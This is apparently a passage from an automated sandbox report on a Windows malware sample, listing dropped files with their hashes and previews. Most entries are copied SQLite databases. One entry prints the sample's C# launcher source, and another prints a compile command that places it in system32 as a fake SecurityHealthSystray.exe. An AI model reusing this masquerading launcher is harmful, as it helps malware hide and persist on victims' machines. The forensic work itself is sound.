                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\qsvDfYEAgo

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\qx5WRHXgp5

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\rFQ9xhelYg

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\raRUZORlIO

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\rdgEj5wd2g

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\rjgJP5K0B1

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.0.cs

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):405
                                                                                                                                Entropy (8bit):4.914099476531183
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LSMyCaiFkD:JNVQIbSfhV7TiFkMSfhWLSM37FkD
                                                                                                                                MD5:D8F55D29F0B96264590A744EE294B298
                                                                                                                                SHA1:61C396F562E1F2D559FF6783588078B9EB8EE787
                                                                                                                                SHA-256:691FF1683509D9936B7147F75C39D46A7D99C002AB31B03560FFA57C928F2A4F
                                                                                                                                SHA-512:A2E0A840BEE51F1AF49D1623AA3555D00AD8CF3BFB6285BCD699F696147C0D08596809C1ABC24EAB448BB26534E6E81D10DAAC127536F6400243446AA0535358
                                                                                                                                Malicious:false
                                                                                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows mail\Memory Compression.exe"); } catch { } }).Start();. }.}.

                                                                                                                                C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.cmdline

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):251
                                                                                                                                Entropy (8bit):5.067081458149007
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923fF:Hu7L//TRq79cQy9
                                                                                                                                MD5:E551C5052B0AF164584BBDDA439D529D
                                                                                                                                SHA1:9AAB34DA89ED7B8B79A62582C510596F2BAF05A9
                                                                                                                                SHA-256:03417BF4B037AB66175ACE030628B27ACA1873FB8C611EDD7B9B3F763463EE7C
                                                                                                                                SHA-512:821463FB08A40448237120E91045E1DA373DD02E8DC21FE45042BF5F38374DDB6439B8D6454BE2A1CED92DC7857CDBF2AC6AC8EEBD0845FBE6114EB57D8FF1F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.0.cs"

                                                                                                                                C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.out

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Udzp7lL5ns.exe
                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):752
                                                                                                                                Entropy (8bit):5.244672531110135
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:KMi/I/u7L//TRq79cQy4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/Vq79ty4Kax5DqBVKVrdFAMBt
                                                                                                                                MD5:3F7297FE8F3531ABA4625F55E5DF67C0
                                                                                                                                SHA1:3E50B55F0C9DF8B035B34D1B3642A5776F4F9BD1
                                                                                                                                SHA-256:3D78495BFC0D7DE58E925CCDDBA1B7F111D380317C5BE5B1F3EFCCF664905D44
                                                                                                                                SHA-512:1052BF572367E21B3E9BD9BA9E4BAB97E38DBE117D14C4CB14052C857D99B9C04AA5E0A397819DBC9A62744FD0FAF1708E77F7852792FA79864115B1F2E085D8
                                                                                                                                Malicious:false
                                                                                                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rm05dpm5\rm05dpm5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                C:\Users\user\AppData\Local\Temp\rtVETB744a

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):98304
                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\tJ9BAGePab

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\tneWKslRqj

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\u7iU0DiFhZ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\uQ5ZeHVkzs

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ue4F0AHyVc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\unqsKDiF1C

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\v3jUukClLg

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\vHVnGvi8SJ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\vfPvzVAH7O

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\vnOCOToo74

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\wTXpKBl1Zj

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\wbV7FXNriS

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
